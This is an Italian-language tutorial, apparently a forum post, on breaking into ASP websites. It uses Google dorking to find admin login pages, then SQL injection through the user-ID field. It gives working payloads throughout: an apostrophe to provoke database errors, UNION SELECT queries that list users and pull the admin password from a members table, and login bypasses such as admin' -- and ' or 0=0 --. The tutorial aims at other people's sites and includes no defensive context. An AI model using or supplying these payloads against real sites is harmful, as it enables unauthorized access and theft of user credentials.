Hackerare un sito in ASP
Per prima cosa su google dovete usare il google hacking per trovare i siti provate {allinurl:admin.asp} oppure {inurl:admin.asp}.
Cmq queste sono solo delle ipotesi...dovete essere crativi...
Come hackerare un sito fatto in .asp
Prima passo portiamoci in una pagina che preveda un
login utente, poi dove si inserisce l' userID bisogna inserire
' (l'apostrofo) ed inviare,
non bisogna inserire alcun tipo di password.
Se tutto è andato a buon fine, dovrebbe apparire un messagio del tipo:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query
expression 'ID=''' AND PASSWORD='''.
/scripts/login.asp, line 30
in caso contrario ci apparirà un messagio che ci informa che userID o la
password sono errati ( in questi casi molto probabilmete non sono possibili
azioni maliziose).
Ora tornando alla nostra applicazione modificabile iniziamo a ricercare
informazioni come lo scoprire se esiste o meno un utente admin andando ad
inserire nella zona dell' userID il seguente comando:
' union select min(UserID),1,1,1 from members where
UserID > 'a'--
oppure possiamo tentare di trovare addirittura la
password dell' admin inserendo sempre nel campo dell' userID il comando:
' union select Password,1,1,1 from members where
UserID = 'admin'--
di questi comandi simili ce ne sono parecchi come ad esempio:
admin' --
che ci permette di validarci come admin oppure un' altro comando potrebbe
essere:
' or 0=0 --sp_password
che ci permetterà il login come il primo utente presente nella lista.
Grazie, vi saluto ciaoooo..
